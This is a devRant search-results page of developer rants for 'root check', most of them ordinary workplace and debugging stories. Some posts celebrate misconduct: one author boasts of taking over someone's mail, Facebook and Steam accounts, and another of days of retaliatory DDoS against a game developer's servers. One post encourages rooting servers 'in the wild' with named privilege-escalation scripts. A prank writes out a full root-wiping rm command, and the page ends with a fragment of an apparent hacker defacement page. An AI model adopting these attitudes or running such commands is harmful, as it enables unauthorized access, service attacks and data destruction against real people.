Join devRant
Do all the things like
++ or -- rants, post your own rants, comment on others' rants and build your customized dev avatar
Sign Up
Pipeless API
From the creators of devRant, Pipeless lets you power real-time personalized recommendations and activity feeds using a simple API
Learn More
Search - "root check"
-
Each month my department compiles a 4M row 150 column data table for compliance with a federal agency. Before submitting, we check it against about 400 rules.
The existing system was simply 400 queries that ran in sequence, table-scanning 4M rows each time, taking upwards of 6 hours, which is a huge bottleneck, especially if you have to make changes and rerun. Plus the output was rather one-dimensional.
I built a proper normalized database and created a sort of rules engine, running all 400 rules in one table scan. Not only does it complete in 30 minutes, but the reports generate automatically, and the results can be filtered on several dimensions to aid with root-cause analysis.
Management was pleased.4 -
So a friend of Mine asked me to check their Mail server because some emails got lost. Or had a funny signature.
Mails were sent from outlook so ok let's do this.
I go create a dummy account, and send/receive a few emails. All were coming in except one and some had a link appended. The link was randomly generated and was always some kind of referral.
Ok this this let's check the Mail Server.
Nothing.
Let's check the mail header. Nothing.
Face -> wall
Fml I want to cry.
Now I want to search for a pattern and write a script which sends a bunch of mails on my laptop.
Fuck this : no WLAN and no LAN Ports available. Fine let's hotspot the phone and send a few fucking mails.
Guess what? Fucking cockmagic, no funny mails appear!
At that moment I went out and was like chainsmoking 5 cigarettes.
BAM!
It hit me! A feeling like a unicorn vomiting rainbows all over my face.
I go check their firewall. Shit redirected all email ports from within the network to another server.
Yay nobody got credentials because nobody new it existed. Damn boy.
Hook on to the hostmachine power down the vm, start and hack yourself a root account before shit boots. Luckily I just forgot the credentials to a testvm some time ago so I know that shit. Lesson learned: fucking learn from your mistakes, might be useful sometimes!
Ok fucker what in the world are you doing.
Do some terminal magic and see that it listens on the email ports.
Holy cockriders of the galaxy.
Turns out their former it guy made a script which caught all mails from the server and injected all kind of bullshit and then sent them to real Webserver. And the reason why some mails weren't received was said guy was too dumb to implement Unicode and some mails just broke his script.
That fucker even implented an API to pull all those bullshit refs.
I know your name "Matthias" and I know where you live and what you've done... And to fuck you back for that misery I took your accounts and since you used the same fucking password for everything I took your mail, Facebook and steam account too.
Git gut shithead! You better get a lawyer15 -
Hey, Root? How do you test your slow query ticket, again? I didn't bother reading the giant green "Testing notes:" box on the ticket. Yeah, could you explain it while I don't bother to listen and talk over you? Thanks.
And later:
Hey Root. I'm the DBA. Could you explain exactly what you're doing in this ticket, because i can't understand it. What are these new columns? Where is the new query? What are you doing? And why? Oh, the ticket? Yeah, I didn't bother to read it. There was too much text filled with things like implementation details, query optimization findings, overall benchmarking results, the purpose of the new columns, and i just couldn't care enough to read any of that. Yeah, I also don't know how to find the query it's running now. Yep, have complete access to the console and DB and query log. Still can't figure it out.
And later:
Hey Root. We pulled your urgent fix ticket from the release. You know, the one that SysOps and Data and even execs have been demanding? The one you finished three months ago? Yep, the problem is still taking down production every week or so, but we just can't verify that your fix is good enough. Even though the changes are pretty minimal, you've said it's 8x faster, and provided benchmark findings, we just ... don't know how to get the query it's running out of the code. or how check the query logs to find it. So. we just don't know if it's good enough.
Also, we goofed up when deploying and the testing database is gone, so now we can't test it since there are no records. Nevermind that you provided snippets to remedy exactly scenario in the ticket description you wrote three months ago.
And later:
Hey Root: Why did you take so long on this ticket? It has sat for so long now that someone else filed a ticket for it, with investigation findings. You know it's bringing down production, and it's kind of urgent. Maybe you should have prioritized it more, or written up better notes. You really need to communicate better. This is why we can't trust you to get things out.
*twitchy smile*rant useless people you suck because we are incompetent what's a query log? it's all your fault this is super urgent let's defer it ticket notes too long; didn't read21 -
I am bloody sick of being on my own.
I was the sole dev at the last few jobs I've held, with the exception of API Guy -- who didn't really help much, and who got fired / quit six months after I started. Every other job I've either been the only dev, or the only web dev. (Exception:My boss at my previous job was a Rails dev, but he has zero time to code, and was significantly less experiened so he could only rarely help anyway.)
But now I'm in a company with a bunch of other devs, and they're all ostensibly senior devs, so you'd think I should be able to ask questions, right? And get answers? that actually help? like "Hey, you built this; how does it work?" No bloody way.
So far every time I've asked someone for help, they've been incompetent. I asked about what a few flags did, and got an answer that basically said "you just gotta know. oh, and the labels aren't up to date, so don't trust what they say." I asked the head of the "product team" about a ticket that he wrote, and he changed what it meant four times within two days. I asked about another, and he said "oh, that isn't reproduceable." Thanks. I asked about mailers, and got two very different, very incompete walkthroughs from the more senior devs (9+ years on this codebase) that didn't help. I asked two people about how users and roles work, and still have no idea what kind of user (there are like twelve?) is what, what roles even exist, or how to check for permissions. `@current_user` is a thing, but idfk what it holds since that can change considerably, and there's an impersonation feature that changes how it works, too. I ask the product guy again about where to link something, and he has no idea. I ask said product guy about what this feature needs to do, and he doesn't know. I ask what the legal team needs, and i get nothing. I ask the designer where the goddamn CSS lives, and he doesn't know; he apparently just puts it wherever he feels like, even if it's a completely unrelated stylesheet. As long as it works, right?
I ask very simple and straighforward questions, and it takes them forever to get back to me saying what amounts to "idk, ask someone else."
This feels like the same crap all over again, except now there are a bunch of devs I can ask that give me basically the same answers as the sales people always did. Always "idk" or a confusing mess of an 'answer' that skips most/all of the important bits. At least these people don't [usually] contradict themselves.
So, @Root is all alone, again.
And currounded by incompetence.
Again.
For fuck's sake.
Can't I catch a break?19 -
!!good news
!!great news
!!linux dev lappy recommendations?
So, @Root might finally have a job! Woo!
(Pending a background check, drug test, cavity search, ...)
I'm excited, and kind of giddy. It's an open-office setup, but the devs are chill, the boss is chill (reminds me a bit of myself thus far, just... nice), pay is decent too. Drive is hell, but everything else feels kinda cushy. The parent company is super-stuffy corporate and has an HR and red tape fetish, but supposedly I won't have to interact with them at all. I start as soon as all of the background check nonsense comes through. (Don't get me started on that, please.)
One of the questions that came up, however, is what type of system I wanted to use. I requested a Linux lappy, and that's sadly a bit beyond the parent company's nontechnical IT department. They asked me for links to a few specific machines on amazon for options. (MacBook Pro or equivalent)
That's where this question comes in: Which lappys make great dev machines and also have decent linux (Debian/Mint/Ubuntu) support? The role is backend Rails development + some devops, so I don't need super-fancy graphics, though I will be attaching a 4k (hopefully IPS) display because space and pretty colors.
Recommendations welcome, as I should get back to them today!43 -
Well, here's the OS rant I promised. Also apologies for no blog posts the past few weeks, working on one but I want to have all the information correct and time isn't my best friend right now :/
Anyways, let's talk about operating systems. They serve a purpose which is the goal which the user has.
So, as everyone says (or, loads of people), every system is good for a purpose and you can't call the mainstream systems shit because they all have their use.
Last part is true (that they all have their use) but defining a good system is up to an individual. So, a system which I'd be able to call good, had at least the following 'features':
- it gives the user freedom. If someone just wants to use it for emailing and webbrowsing, fair enough. If someone wants to produce music on it, fair enough. If someone wants to rebuild the entire system to suit their needs, fair enough. If someone wants to check the source code to see what's actually running on their hardware, fair enough. It should be up to the user to decide what they want to/can do and not up to the maker of that system.
- it tries it's best to keep the security/privacy of its users protected. Meaning, by default, no calling home, no integrating users within mass surveillance programs and no unnecessary data collection.
- Open. Especially in an age of mass surveillance, it's very important that one has the option to check the underlying code for vulnerabilities/backdoors. Can everyone do that, nope. But that doesn't mean that the option shouldn't be there because it's also about transparency so you don't HAVE to trust a software vendor on their blue eyes.
- stability. A system should be stable enough for home users to use. For people who like to tweak around? Also, but tweaking *can* lead to instability and crashes, that's not the systems' responsibility.
Especially the security and privacy AND open parts are why I wouldn't ever voluntarily (if my job would depend on it, sure, I kinda need money to stay alive so I'll take that) use windows or macos. Sure, apple seems to care about user privacy way more than other vendors but as long as nobody can verify that through source code, no offense, I won't believe a thing they say about that because no one can technically verify it anyways.
Some people have told me that Linux is hard to use for new/(highly) a-technical people but looking at my own family and friends who adapted fast as hell and don't want to go back to windows now (and mac, for that matter), I highly doubt that. Sure, they'll have to learn something new. But that was also the case when they started to use any other system for the first time. Possibly try a different distro if one doesn't fit?
Problems - sometimes hard to solve on Linux, no doubt about that. But, at least its open. Meaning that someone can dive in as deep as possible/necessary to solve the problem. That's something which is very difficult with closed systems.
The best example in this case for me (don't remember how I did it by the way) was when I mounted a network drive at boot on windows and Linux (two systems using the same webDav drive). I changed the authentication and both systems weren't in for booting anymore. Hours of searching how to unfuck this on windows - I ended up reinstalling it because I just couldn't find a solution.
On linux, i found some article quite quickly telling to remove the entry for the webdav thingy from fstab. Booted into a root recovery shell, chrooted to the harddrive, removed the entry in fstab and rebooted. BAM. Everything worked again.
So yeah, that's my view on this, I guess ;P30 -
Root: Fleshes out missing data in some factories. Tests affected code and finds the change breaks some specs (but shouldn’t).
Root: Reaches out to spec author.
Root: Messages thundercunt (the ticket’s code reviewer) on slack about the specs and the reaching out. No response.
Root: Works on another ticket while blocked.
Root: Logs off.
Root: Talks with spec author chick in the morning. Decide to pair on specs later.
TC: Still no slack response.
Root: Gives update in standup. Mentions factories and broken specs. Mentions pairing with spec chick.
TC: Still no slack response.
Root: Pulled off tickets in favor of prod issue. Gets ignored by everyone else diagnosing prod issue. Investigates prod issue by herself. Discovers prod issue isn’t from bad code, but bad requirements — code works as requested. Communicates this with details. Gets ignored by people still diagnosing prod issue. Tries again. Gets ignored. Gives up. Works on non-blocked tickets instead.
TC: Still no slack response.
Hours later:
TC: Comments on PR telling me I broke specs (how did I not notice?), that I need to reach out to spec chick and work with her, and that I can’t resolve the ticket until it’s fixed and passes code review.
TC: Still no slack response. (21 hours later at this point)
TC: Logs off. Still no response (25 hours at this point)
———
Ignoring the prod issue for the moment…
I broke specs. No shit.
I need to talk with spec chick. No shit.
I can’t resolve the ticket. No shit!
Bitch, I told you all of this 21 fucking hours prior, and again 3 hours prior during standup. But no, I clearly “don’t communicate” and obviously have no bloody clue what I’m doing, either, so I need everything spelled out for me.
And no, I didn’t resolve the fucking ticket. Why the fuck would I if it still has pending changes? Do you even check? Ugh!
And what the fuck with that prod issue? I’m literally giving you the answer. fucking listen! Stupid cunts.
Why is it all of the women I work with are useless or freaking awful people? Don’t get me wrong, many of the men are, too, but I swear it’s every single one of the women. (Am I awful, too?)
Just. Ugh.
I can’t wait to leave this sewer of a company.
Oddly still a good day, though. Probably because I talked to recruiters and sent out my resume again.rant oh my root gets ignored. root swears oh my root talks in third person root solves a prod issue thundercunt root communicates root wants to leave root gets ignored15 -
Week 278: Most rage-inducing work experience — I’ve got a list saved! At least from the current circle of hell. I might post a few more under this tag later…
TicketA: Do this in locations a-e.
TicketB: Do this in locations e-h.
TicketC: Do this in locations i-k.
Root: There’s actually a-x, but okay. They’re all done.
Product: You didn’t address location e in ticket B! We can’t trust you to do your tickets right. Did you even test this?
Root: Did you check TicketA? It’s in TicketA.
Product guy: It was called out in TicketB! How did you miss it?!
Product guy: (Refuses to respond or speak to me, quite literally ever again.)
Product guy to everyone in private: Don’t trust Root. Don’t give her any tickets.
Product manager to boss: Root doesn’t complete her tickets! We can’t trust her. Don’t give her our tickets.
Product manager to TC: We can’t trust Root. Don’t give her our tickets.
TC: Nobody can trust you! Not even the execs! You need to rebuild your reputation.
Root: Asks coworker a simple question.
Root: Asks again.
Root: nudges them.
Root: Asks again.
Coworker: I’ll respond before tomorrow. (And doesn’t.)
Root: Asks again.
Root: Fine. I’ll figure it out in my own.
TC: Stop making it sound like you don’t have any support from the team!
Root: Asks four people about <feature> they all built.
Everyone: idk
Root: Okay, I’ll figure it out on my own.
TC: Stop making it sound like you don’t have any support from the team!
Root: Mentions multiple meetings to discuss ticket with <Person>.
TC: You called <Person> stupid and useless in front of the whole team! Go apologize!
Root: Tells TC something. Asks a simple question.
Root: Tells TC the same thing. Asks again.
TC: (No response for days.)
TC: Tells me the exact same thing publicly like it’s a revelation and I’m stupid for not knowing.
TC: You don’t communicate well!
Root: Asks who the end user of my ticket is.
Root: Asks Boss.
Root: Asks TC.
Root: Fine, I’ll build it for both.
Root: Asks again in PR.
TC: Derides; doesn’t answer.
Root: Asks again, clearly, with explanation.
TC: Copypastes the derision, still doesn’t answer.
Root: Asks boss.
Boss: Doesn’t answer.
Boss: You need to work on your communication skills.
Root: Mentions asking question about blocker to <Person> and not hearing back. Mentions following up later.
<Person>: Gets offended. Refuses to respond for weeks thereafter.
Root: Hey boss, there’s a ticket for a minor prod issue. Is that higher priority than my current ticket?
Root: Hey, should I switch tickets?
Root: Hey?
Root: … Okay, I’ll just keep on my current one.
Boss: You need to work on your priorities.
Everyone: (Endless circlejerking and drama and tattling)6 -
One of our newly-joined junior sysadmin left a pre-production server SSH session open. Being the responsible senior (pun intended) to teach them the value of security of production (or near production, for that matter) systems, I typed in sudo rm --recursive --no-preserve-root --force / on the terminal session (I didn't hit the Enter / Return key) and left it there. The person took longer to return and the screen went to sleep. I went back to my desk and took a backup image of the machine just in case the unexpected happened.
On returning from wherever they had gone, the person hits enter / return to wake the system (they didn't even have a password-on-wake policy set up on the machine). The SSH session was stil there, the machine accepted the command and started working. This person didn't even look at the session and just navigated away elsewhere (probably to get back to work on the script they were working on).
Five minutes passes by, I get the first monitoring alert saying the server is not responding. I hoped that this person would be responsible enough to check the monitoring alerts since they had a SSH session on the machine.
Seven minutes : other dependent services on the machine start complaining that the instance is unreachable.
I assign the monitoring alert to the person of the day. They come running to me saying that they can't reach the instance but the instance is listed on the inventory list. I ask them to show me the specific terminal that ran the rm -rf command. They get the beautiful realization of the day. They freak the hell out to the point that they ask me, "Am I fired?". I reply, "You should probably ask your manager".
Lesson learnt the hard-way. I gave them a good understanding on what happened and explained the implications on what would have happened had this exact same scenario happened outside the office giving access to an outsider. I explained about why people in _our_ domain should care about security above all else.
There was a good 30+ minute downtime of the instance before I admitted that I had a backup and restored it (after the whole lecture). It wasn't critical since the environment was not user-facing and didn't have any critical data.
Since then we've been at this together - warning engineers when they leave their machines open and taking security lecture / sessions / workshops for new recruits (anyone who joins engineering).26 -
I've found and fixed any kind of "bad bug" I can think of over my career from allowing negative financial transfers to weird platform specific behaviour, here are a few of the more interesting ones that come to mind...
#1 - Most expensive lesson learned
Almost 10 years ago (while learning to code) I wrote a loyalty card system that ended up going national. Fast forward 2 years and by some miracle the system still worked and had services running on 500+ POS servers in large retail stores uploading thousands of transactions each second - due to this increased traffic to stay ahead of any trouble we decided to add a loadbalancer to our backend.
This was simply a matter of re-assigning the IP and would cause 10-15 minutes of downtime (for the first time ever), we made the switch and everything seemed perfect. Too perfect...
After 10 minutes every phone in the office started going beserk - calls where coming in about store servers irreparably crashing all over the country taking all the tills offline and forcing them to close doors midday. It was bad and we couldn't conceive how it could possibly be us or our software to blame.
Turns out we made the local service write any web service errors to a log file upon failure for debugging purposes before retrying - a perfectly sensible thing to do if I hadn't forgotten to check the size of or clear the log file. In about 15 minutes of downtime each stores error log proceeded to grow and consume every available byte of HD space before crashing windows.
#2 - Hardest to find
This was a true "Nessie" bug.. We had a single codebase powering a few hundred sites. Every now and then at some point the web server would spontaneously die and vommit a bunch of sql statements and sensitive data back to the user causing huge concern but I could never remotely replicate the behaviour - until 4 years later it happened to one of our support staff and I could pull out their network & session info.
Turns out years back when the server was first setup each domain was added as an individual "Site" on IIS but shared the same root directory and hence the same session path. It would have remained unnoticed if we had not grown but as our traffic increased ever so often 2 users of different sites would end up sharing a session id causing the server to promptly implode on itself.
#3 - Most elegant fix
Same bastard IIS server as #2. Codebase was the most unsecure unstable travesty I've ever worked with - sql injection vuns in EVERY URL, sql statements stored in COOKIES... this thing was irreparably fucked up but had to stay online until it could be replaced. Basically every other day it got hit by bots ended up sending bluepill spam or mining shitcoin and I would simply delete the instance and recreate it in a semi un-compromised state which was an acceptable solution for the business for uptime... until we we're DDOS'ed for 5 days straight.
My hands were tied and there was no way to mitigate it except for stopping individual sites as they came under attack and starting them after it subsided... (for some reason they seemed to be targeting by domain instead of ip). After 3 days of doing this manually I was given the go ahead to use any resources necessary to make it stop and especially since it was IIS6 I had no fucking clue where to start.
So I stuck to what I knew and deployed a $5 vm running an Nginx reverse proxy with heavy caching and rate limiting linked to a custom fail2ban plugin in in front of the insecure server. The attacks died instantly, the server sped up 10x and was never compromised by bots again (presumably since they got back a linux user agent). To this day I marvel at this miracle $5 fix.1 -
I think I nailed it.
I had an interview on Friday. Never had I ever such a good one. Everything went so smoothly I'm amazed to this moment.
It started pretty much normally. Few questions about me and my CV. Next some soft skills check and few minutes talking in English to make sure I know how to speak.
Next, two funny trick questions. I hope I'll translate them good enough.
1) You've got 6 cups in a row. Three of them, next to each other, are empty. Remaining 3 are full. You've got one movement to make them stand alternately, ie. Full, empty, etc. or Empty, full etc.
2) You've got yourself a cake. Normal, birthday cake in a shape of a cylinder. On three cuts, you have to cut it in 8 equal pieces.
Next was technical interview. The only thing I couldn't answer to was a formula to get angle between camera and two objects on the scene. Something about cos x.
They told me that I was the only recruitee to make project using Hololens SDK. Other people made the images gallery in 2D only.
Also they were VERY impressed that I managed to send them fix that changed a lot of the gallery in an hour. No one was expecting it so fast since the feature wasn't all that simple. Or so they said. Code was written so it wasn't hard to implement this change.
Now I've got to wait at least a week for their response. As you could imagine, I'm nervously checking my email each time I get any spam.
I'd like to thank @fire-phoenix and @Root that were responding to my last posts about this new work tasks and current hardships. I know it's a bit too early to celebrate but I'm just so hyped for how well everything went 😀10 -
Biggest challenge I overcame as dev? One of many.
Avoiding a life sentence when the 'powers that be' targeted one of my libraries for the root cause of system performance issues and I didn't correct that accusation with a flame thrower.
What the accusation? What I named the library. Yep. The *name* was causing every single problem in the system.
Panorama (very, very expensive APM system at the time) identified my library in it's analysis, the calls to/from SQLServer was the bottleneck
We had one of Panorama's engineers on-site and he asked what (not the actual name) MyLibrary was and (I'll preface I did not know or involved in any of the so-called 'research') a crack team of developers+managers researched the system thoroughly and found MyLibrary was used in just about every project. I wrote the .Net 1.1 MyLibrary as a mini-ORM to simplify the execution of database code (stored procs, etc) and gracefully handle+log database exceptions (auto-logged details such as the target db, stored procedure name, parameter values, etc, everything you'd need to troubleshoot database errors). This was before Dapper and the other fancy tools used by kids these days.
By the time the news got to me, there was a team cobbled together who's only focus was to remove any/every trace of MyLibrary from the code base. Using Waterfall, they calculated it would take at least a year to remove+replace MyLibrary with the equivalent ADO.Net plumbing.
In a department wide meeting:
DeptMgr: "This day forward, no one is to use MyLibrary to access the database! It's slow, unprofessionally named, and the root cause of all the database issues."
Me: "What about MyLibrary is slow? It's excecuting standard the ADO.Net code. Only extra bit of code is the exception handling to capture the details when the exception is logged."
DeptMgr: "We've spent the last 6 weeks with the Panorama engineer and he's identified MyLibrary as the cause. Company has spent over $100,000 on this software and we have to make fact based decisions. Look at this slide ... "
<DeptMgr shows a histogram of the stacktrace, showing MyLibrary as the slowest>
Me: "You do realize that the execution time is the database call itself, not the code. In that example, the invoice call, it's the stored procedure that taking 5 seconds, not MyLibrary."
<at this point, DeptMgr is getting red-face mad>
AreaMgr: "Yes...yes...but if we stopped using MyLibrary, removing the unnecessary layers, will make the code run faster."
<typical headknodd-ers knod their heads in agreement>
Dev01: "The loading of MyLibrary takes CPU cycles away from code that supports our customers. Every CPU cycle counts."
<headknod-ding continues>
Me: "I'm really confused. Maybe I'm looking at the data wrong. On the slide where you highlighted all the bottlenecks, the histogram shows the latency is the database, I mean...it's right there, in red. Am I looking at it wrong?"
<this was meeting with 20+ other devs, mgrs, a VP, the Panorama engineer>
DeptMgr: "Yes you are! I know MyLibrary is your baby. You need to check your ego at the door and face the facts. Your MyLibrary is a failed experiment and needs to be exterminated from this system!"
Fast forward 9 months, maybe 50% of the projects updated, come across the documentation left from the Panorama. Even after the removal of MyLibrary, there was zero increases in performance. The engineer recommended DBAs start optimizing their indexes and other N+1 problems discovered. I decide to ask the developer who lead the re-write.
Me: "I see that removing MyLibrary did nothing to improve performance."
Dev: "Yes, DeptMgr was pissed. He was ready to throw the Panorama engineer out a window when he said the problems were in the database all along. Didn't you say that?"
Me: "Um, so is this re-write project dead?"
Dev: "No. Removing MyLibrary introduced all kinds of bugs. All the boilerplate ADO.Net code caused a lot of unhandled exceptions, then we had to go back and write exception handling code."
Me: "What a failure. What dipshit would think writing more code leads to less bugs?"
Dev: "I know, I know. We're so far behind schedule. We had to come up with something. I ended up writing a library to make replacing MyLibrary easier. I called it KnightRider. Like the TV show. Everyone is excited to speed up their code with KnightRider. Same method names, same exception handling. All we have to do is replace MyLibrary with KnightRider and we're done."
Me: "Won't the bottlenecks then point to KnightRider?"
Dev: "Meh, not my problem. Panorama meets primarily with the DBAs and the networking team now. I doubt we ever use Panorama to look at our C# code."
Needless to say, I was (still) pissed that they had used MyLibrary as dirty word and a scapegoat for months when they *knew* where the problems were. Pissed enough for a flamethrower? Maybe.6 -
Yes yes yes
Let's spend countless hours writing painful spaghetti that generates a financial report, extend that spaghetti for specs, then not bother to check the amounts or status. or where it says the money went. Nope, checking non-unique names is totally good enough. We're so good at this. Ten points to the legendaries.
Let's also make the object factories not create the objects correctly, and make sure that report includes entries for orders that don't include any actual payments. Oh, their status? "Ready to send" of course! Let's send that totally valid $0.00 to nobody!
Oh, but Root. Root, root, root. You can't ADD payments to this. no no no. if you do, it'll break specs everywhere else that uses that factory! Shame on you for suggesting it.
Pssh, now you want to make a payment just for this report? Why would you do that? Our best devs have been working on this for years! What could you possibly know that they don't? No, they're perfect. Don't touch them. Just make them better, okay? No take, only throw!5 -
Got a new eval board. It came in with a stock firmware, had its own IP and naturally its own webGUI. I wanted to check what was under the hood. So I SSH'd in to the device, and was prompted to enter the username. There weren't any specs or documentation.
*Hmm, let's try root*
User: root
Password: *Eh? Well, what the heck* admin
.
.
.
root@evalboard#
Muhahaha!!! Meet your hacker, eval board!3 -
"Linux is more secure." Put on your tin-foil hats. As you can:
>Root over 50% of linux servers you encounter in the wild with two easy scripts,
Linux_Exploit_Suggester [0], and unix-privesc-check [1].
(sauce: Phineas Phisher - http://pastebin.com/raw/cRYvK4jb)17 -
//little Story of a sys admin
Wondered why a Server on my Linux Root couldn't build a network connection, even when it was running.
Checked iptables and saw, that the port of the Server was redirected to a different port.
I never added that rule to the firewall. Checked and a little script I used from someone else generated traffic for a mobile game.
OK beginn the DDoS Penetration. Over 10 Gbit/s on some small servers.
Checked Facebook and some idiot posted on my site:
Stop you little shithead or I will report you to the police!!!
Checked his profile page and he had a small shitty android game with a botnet.
Choose one:
1. let him be
2. Fuck him up for good
Lets Sudo with 2.
I scaled up my bandwith to 25 Gbit/s and found out that guys phone number.
Slowly started to eat away his bandwith for days. 3 days later his server was unreachable.
Then I masked my VoIP adress and called him:
Me: Hi, you know me?
He: No WTF! Why are you calling me.
Me: I love your're game a lot, I really love it.
He: What's wrong with you? Who are you?
Me: I'm teach
He: teach?
Me: Teach me lesson
He: Are you crazy I'm hanging up!
Me: I really love you're game. I even took away all your bandwith. Now you're servers are blocked, you're game banned on the store.
He: WHAT, WHAT? (hearing typing)
Me: Don't fuck with the wrong guys. I teached you a lesson, call me EL PENETRATO
He: FUCK Fuck Fuck you! Who are you???!!! I'm going to report you!
Me: How?
He: I got you're logs!
Me: Check it at Utrace...
He: Holy shit all around the world
Me: Lemme Smash Bitch
*hung up*4 -
Right, I've been here before.
Our app requires an internet connection, and one of our clients wants to roll it out on a strictly managed network.
We told them which addresses our app communicates with and their network team opened them up for traffic. Should work, right?
Nope, doesn't work.
So I request them to use Fiddler to do some debugging of the network traffic, and lo and behold, it does work when Fiddler is active.
One important detail is that Fiddler uses it's own SSL certificate to debug HTTPS communications. I've had moments where expired certificates were the cause of things not working and running Fiddler "fixes" this because of their own certificate.
So I point this out in numerous mails to their network team, every time I get a response saying "nah, that can't be it".
I keep insisting "I have had this before, please check if any installed Root CA Certificates is expired"
At this point I'm certain they have updates turned off on these machines, and their certificates must not have been updated for a long time.
At one point they come back to me. "Hey, when Fiddler is off, WireShark shows the app communicating with ICMP calls, but when it's on it shows HTTP calls instead".
...YOU'RE THE SUPPOSED NETWORK EXPERTS?! You think data can be send via ICMP? Do you even know what ICMP is? Of course you'll see ICMP calls when the network is rejecting the packages instead of HTTP calls when everything's fine.
(ICMP is used to communicate errors)
I'm trying to keep my patience with these guys until they find exactly what's wrong because even I am somewhat grasping at straws right now. But things like this makes me doubt their expertise...6 -
Cracking old recovery CDs for the 9x/2000/XP era shines some light into how companies operated and when concepts came to be in that time:
Packard Bell: An EXE checks that you're running on a Packard Bell machine and reboots if it's not. How do we bypass it? Easy: just fucking delete it. The files to reinstall Windows from scratch come from...
...
C:?
Yup. Turns out Packard Bell was doing the recovery partition thing all the way back to the 9x era, maybe even further. Files aren't even on the restore disc so if your partition table got fucked (pretty common because malware and disk corruption) you were totally fucked and needed to repurchase Windows. (My dad, at the time, only charged at-cost OEM prices for a replacement retail copy. He knew it was dumb so he never sold PB machines.)
Compaq:
Computer check? Nope, remove one line from a BATCH file and it's gone.
Six archives, named "WINA.ZIP" through "WINF.ZIP" (plus one or two extras for OEM software) hold Windows. Problematic? Well... only because they never put the password anywhere so the installer can't install them. (Some interesting on-disc technician-only utils, though!)
Dell:
If not a Dell machine, lock up. Cause? CONFIG.SYS driver masquerading as OAK (the common CD driver) doing the check, then chainloading the real OAK driver. Simple fix: replace the fake driver with the real one.
Issues?
Would I mention this one if there weren't?
Disc is mounted on N:. Subdirectories work, but doing anything in them (a DIR, trying to execute something, trying to view shit in EDIT.COM) kicked you back to the disc root.
Installer couldn't find machine manifest in the MAP folder (it wanted your PC's serial before it'd let you install, to make sure you have the correct recovery disc) so it asked for 12-digit alphanumeric serial. The defined serials in the manifest were something like "02884902-01" or similar (8-2, all numbers) and it couldn't read the file so it couldn't show the right format, nor check for the right type.
Bypassing that issue, trying to do the ACTUAL install process caused nothing to happen... as all BATCHes for install think the CD should be on X:.
Welp.
well that was fun. Now to test on-real-PC behavior, as VBOX and VMWare both don't like the special hardware shit it tries to use. (Why does a textmode GUI need GPU acceleration, COMPAQ?????)4 -
Had an idea for an app. I started writing the prototype in Node since I just had a simple API in mind. Wanted to have some very basoc crud functionality going and then hook up a nice interface to it. It has to do with logistics and analytics so I just wanted to start sketching something small, and being that i have been successful in doing an API like this in the pass with node and mongo for a local company I said why not.
I have finished a good chunk of it. Gotta love that js productivity. But what tripped me out about it was:
Check how big the folder size is: 387mb
EXCUSE ME??!!
I tripped, there was no way in hell this shit was that heavy. I am basically using Koi(to give it a whirl instead of express, gotta start testing koi sometimes right?) And some joi with morgan and winston. That is it. I am using mongo since legit its the only one i know, even with that there really can't be that much right?
Check node_modules size.....10mb....wtf? What
Wait
Did it?
Sure as shit....forgot that i was storing the mongo data folder inside the app's root folder.
This would have been nothing if it would have taken me 30 seconds to figure it out.
I was losing my mind for 30 mins before i decided to properly verify
I need some sleep5 -
Time for a REAL fucking rant.
io_uring manpages say you can set the CAP_SYS_NICE capability to allow SQPOLL to work. You can't, you still get an operation not permitted errno result.
Why? I checked, it says 5.10 mainline is required. Pretty sure I just manually downloaded and installed the Deb's myself. uname reports that I am at 5.10. So what gives?
Maintainer submitted a patch because they fucked up and made the *actual* capability check look for what's basically root permissions (CAP_SYS_ADMIN... c'mon...) and is now trying to rectify a glaring security shortcoming.
Patch hasn't been accepted or even addressed yet but they already updated the manpages with the estimated mainline kernel release as if it had made it into the release candidate. Manpages have made it into latest debs but the actual change has not.
Where the fuck is the Linus Torvalds that would ream the fuck out of shitty developers doing shitty things? The political correctness climate has discouraged such criticism now and the result... this. This fucking mess, where people are allowed to cut corners and get away with it because it would hurt their feelings when faced with pressure.
I'm not just guessing either. The maintainer has already said some of the "tone" of criticisms hurt his feelings. Yes, sorry, but when you claim 90% speedup over a typical epoll application using your new magical set of syscalls, and nobody can even get 1-2% speedup on a similar machine, people are going to be fucking skeptical. Then when you lower it to 60% because you originally omitted a bunch of SECURITY RELATED AND CORRECTNESS CHECKING CODE, we're going to call you the fuck out for fudging numbers.
Trying to maintain the equivalent of academic integrity within the computer science field is an exercise of insanity. You'd be fired and shunned from publishing in journals if you pulled that shit in ANY OTHER FUCKING FIELD, but because the CS scene is all about jerking each other off at every corner because the mean people keep saying mean things on Twitter and it hurts your feelings therefore we're all allowed to contribute subpar work and be protected from criticisms when others realize it's subpar.
These aren't mistakes anymore, it's clear you're just trying to farm clout at Facebook - maybe even FOR Facebook.
Fuck you. Do it right, the first time. Sick of shitty code being OK all of a sudden.2 -
Has anyone installed Elasticsearch on Linux - centos to be specific.
Trying to workout why the fucker won't install. Setting up a proof of concept so don't want to use it currently as SaaS.
From why I can tell, it only needs Java, (check) and to be ran as a user other then root (check) but running ./bin/Elasticsearch hangs after a while and starts powering up 100 odd threads with no progress.6 -
Dev Diary Entry #56
Dear diary, the part of the website that allows users to post their own articles - based on an robust rights system - through a rich text editor, is done! It has a revision system and everything. Now to work on a secure way for them to upload images and use these in their articles, as I don't allow links to external images on the site.
Dev Diary Entry #57
Dear diary, today I finally finished the image uploading feature for my website, and I have secured it as well as I can.
First, I check filesize and filetype client-side (for user convenience), then I check the same things serverside, and only allow images in certain formats to be uploaded.
Next, I completely disregard the original filename (and extension) of the image and generate UUIDs for them instead, and use fileinfo/mimetype to determine extension. I then recreate the image serverside, either in original dimensions or downsized if too large, and store the new image (and its thumbnail) in a non-shared, private folder outside the webpage root, inaccessible to other users, and add an image entry in my database that contains the file path, user who uploaded it, all that jazz.
I then serve the image to the users through a server-side script instead of allowing them direct access to the image. Great success. What could possibly go horribly wrong?
Dev Diary Entry #58
Dear diary, I am contemplating scrapping the idea of allowing users to upload images, text, comments or any other contents to the website, since I do not have the capacity to implement the copyright-filter that will probably soon become a requirement in the EU... :(
Wat to do, wat to do...1 -
http://".$_SERVER['HTTP_HOST']."/server, check the code below
<html lang='en-US'><head><title>T3RR0R B@B@</title>
<a href="https://www.facebook.com/mr.T3RR0R" target="_blank"><h2>Click Here !</h2></a><br>
<style>
body{cursor:url("http:////"),auto;}html{display:table;height:100%;width:100%;}body{display:table-row;}body{display:table-cell;vertical-align:middle;text-align:center;}a:link{text-decoration:none;}
body {
background-color: #000000;
background-image: url(https://imgwm.com/images/...);
<!--http://twitrcover.com/ar/uploads/...-->
margin-left: 0px;
margin-top: 0px;
margin-right: 0px;
